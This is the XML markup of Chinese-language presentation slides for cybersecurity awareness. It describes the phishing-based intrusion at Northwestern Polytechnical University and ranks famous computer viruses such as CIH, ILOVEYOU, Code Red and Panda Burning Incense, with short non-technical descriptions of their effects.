              </a:rPr>
              <a:t>14款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同版本，持续对西北工业大学开展攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>窃密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，窃取该校关键网络设备配置、网管数据、运维数据等核心技术数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473710" y="3109595"/>
            <a:ext cx="9348470" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>今年4月，西北工业大学就电子邮件系统遭受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>钓鱼邮件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击的情况报警称，发现一批以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" u="sng">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>科研评审、答辩邀请和出国通知等为主题的钓鱼邮件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，内含木马程序，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>引诱部分师生点击链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>非法获取师生电子邮箱登录权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，致使相关邮件数据出现被窃取风险。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="4587240"/>
            <a:ext cx="9159875" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术团队将此次攻击活动中所使用的武器类别分为四大类，包括</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞攻击突破类武器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>持久化控制类武器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>嗅探窃密类武器，长期潜伏窃取重要的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐蔽消痕类武器，把现场清理干净，让被害人无法察觉</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10207625" y="1361440"/>
            <a:ext cx="1870710" cy="4755515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术团队先后从西北工业大学的多个信息系统和上网终端中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提取到了多款木马样本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，综合使用国内现有数据资源和分析手段，并得到了欧洲、南亚部分国家合作伙伴的通力支持，全面还原了相关攻击事件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总体概貌、技术特征、攻击武器、攻击路径和攻击源头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="等腰三角形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9795510" y="3923030"/>
            <a:ext cx="320675" cy="267970"/>
          </a:xfrm>
          <a:prstGeom prs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p:bldP spid="10" grpId="1"/>
      <p:bldP spid="12" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="12" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="13"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7860" y="969010"/>
            <a:ext cx="9728835" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>源自美国国安局</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，受害机器的磁盘文件会被加密，只有支付赎金才能解密恢复。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIH病毒(1998)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：一位名叫陈盈豪的台湾大学生所编写，电脑硬盘被垃圾数据覆盖，甚至会破坏电脑的BIOS，最后连电脑都无法启动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>梅利莎病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：大卫L史密斯运用Word软件里的宏运算编写了一个电脑病毒，通过微软的Outlook传播，一旦收件人打开邮件，病毒就会自动向50位好友复制发送同样的邮件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这也是第一个引起全球社会关注的电脑病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>冲击波病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：利用当时的RPC漏洞，使系统操作异常、不停重启、甚至导致系统崩溃。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这个病毒的变种至今仍有存活，小心中招哦。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>爱虫病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：通过Outlook电子邮件系统传播，主题就是“I Love You”，要是打开病毒附件，就会使电脑中毒。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是迄今为止发现的传染速度最快而且传染面积最广的计算机病毒。</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896302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top</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计算机病毒排名</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>受害用户多达百万，损失超过亿元</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20265" y="1184275"/>
            <a:ext cx="9728835" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>震荡波病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：电脑一旦中招就会莫名其妙地死机或重新启动计算机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>MyDoom病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：通过电子邮件附件和P2P网络Kazaa传播，会自动生成病毒文件，修改注册表，通过电子邮件进行传播。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>熊猫烧香病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：被感染的电脑会出现“熊猫烧香”的图案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>红色代码病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：感染运行Microsoft IIS Web服务器的计算机，取得所攻破主机的所有权限并为所欲为，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盗走机密数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="1">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2400" b="1">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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14388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top</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计算机病毒排名</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612005" y="3845560"/>
            <a:ext cx="1546860" cy="2672080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429375" y="4230370"/>
            <a:ext cx="1870075" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Mountain Dew</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55651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计算机病毒之最</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2146935" y="1150620"/>
            <a:ext cx="9872345" cy="4556125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最具有杀伤力的计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
